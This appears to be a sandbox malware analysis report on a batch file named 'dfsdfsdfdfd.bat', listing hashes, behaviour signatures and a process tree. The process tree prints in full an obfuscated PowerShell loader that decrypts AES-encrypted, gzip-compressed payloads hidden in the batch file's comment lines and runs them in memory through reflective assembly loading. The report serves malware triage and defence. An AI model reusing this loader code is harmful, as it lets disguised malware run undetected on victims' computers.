Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
18-05-2024 04:11
Static task
static1
Behavioral task
behavioral1
Sample
dfsdfsdfdfd.bat
Resource
win7-20240508-en
windows7-x64
4 signatures
150 seconds
General
-
Target
dfsdfsdfdfd.bat
-
Size
3.1MB
-
MD5
0a58848ce845e34a7d2dbc19ce098273
-
SHA1
94f5f718236ea1e03e3fca2c94379091bcde7b0a
-
SHA256
79f1c664fbd6e7d4c2b5d80334beada369f6dfd124fb381eb369a5614612d742
-
SHA512
b8bd4d237def9bee465f59c7e7613992117625495ddbf5882daf1869fb99949da08d488e452d8dafc191cebaff5368cc417988251d08076727d1c24336d9098e
-
SSDEEP
49152:znu22u/gq5TvoJdoXJ+vtFOxSvvE+6hew+zDkoq7sNQ0TBYVlMeCEvT:B
Score
3/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 3036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3036 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1608 wrote to memory of 3036 1608 cmd.exe powershell.exe PID 1608 wrote to memory of 3036 1608 cmd.exe powershell.exe PID 1608 wrote to memory of 3036 1608 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\dfsdfsdfdfd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zajFr+qbrTzqAWrV9u4GkVgssa1V+CAHIWD11CfXvpI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('J0GLdnzPAzFZi0gM9ir5bQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QGFAi=New-Object System.IO.MemoryStream(,$param_var); $hKhJu=New-Object System.IO.MemoryStream; $slkWt=New-Object System.IO.Compression.GZipStream($QGFAi, [IO.Compression.CompressionMode]::Decompress); $slkWt.CopyTo($hKhJu); $slkWt.Dispose(); $QGFAi.Dispose(); $hKhJu.Dispose(); $hKhJu.ToArray();}function execute_function($param_var,$param2_var){ $eryyH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uGztN=$eryyH.EntryPoint; $uGztN.Invoke($null, $param2_var);}$URwGD = 'C:\Users\Admin\AppData\Local\Temp\dfsdfsdfdfd.bat';$host.UI.RawUI.WindowTitle = $URwGD;$hufpU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($URwGD).Split([Environment]::NewLine);foreach ($eduJa in $hufpU) { if ($eduJa.StartsWith(':: ')) { $GrmAl=$eduJa.Substring(3); break; }}$payloads_var=[string[]]$GrmAl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036